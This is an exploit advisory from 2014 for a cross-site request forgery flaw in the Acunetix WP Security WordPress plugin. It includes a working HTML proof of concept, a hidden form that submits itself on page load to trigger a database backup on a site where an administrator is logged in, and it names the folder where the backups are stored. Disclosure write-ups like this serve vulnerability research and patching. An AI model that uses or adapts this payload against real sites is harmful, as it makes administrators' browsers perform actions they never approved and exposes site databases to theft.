###################################################################################################################################
# Exploit Title: Wordpress Plugin - Acunetix WP Security Make Backup CSRF
# Date: 2014 11 Fabruary
# Exploit Author: Yashar shahinzadeh
# Special thanks to Mormoroth
# Credit goes for: http://y-shahinzadeh.ir & ha.cker.ir
# Vendor Homepage: http://wordpress.org/plugins/wp-security-scan/
# Tested on: Linux & Windows, PHP 5.3.2
# Affected Version : 4.0.3 (Last)
#
# Contacts: { http://Twitter.com/YShahinzadeh , http://y-shahinzadeh.ir , http://Twitter.com/Mormoroth , http://mormoroth.ir }
###################################################################################################################################
Summary:
========
1. CSRF / Get Backup
2. Further Information
1. CSRF / Get Backup:
=====================
The Acunetix WP Security Suffers from CSRF attack, getting backup of wordpress database and saving it in backup folder. Although it has a good random generator function producing
none-guessable numeric values, it still is a vulnerability which can be used against wordpress in a complex attack scenario. Here is a simple exploit:
<html>
<body onload="submitForm()">
<form name="myForm" id="myForm" action="http://localhost/wordpress-3.8/wp-admin/admin.php?page=wps_database" method="post">
<input type="hidden" name="wsd_db_backup" value="">
<input type="hidden" name="backupDatabaseButton" value="Backup+now%21">
</form>
<script type='text/javascript'>document.myForm.submit();</script>
</html>
Backup files are stored in /wp-content/plugins/wp-security-scan/res/backups/ directory. It's protected with an index, though.
2. Further Information:
=======================
Further analysis about backup function and attacking against it can be found at my blog, http://blog.y-shahinzadeh.ir
/** Yasshar Shahinzadeh **/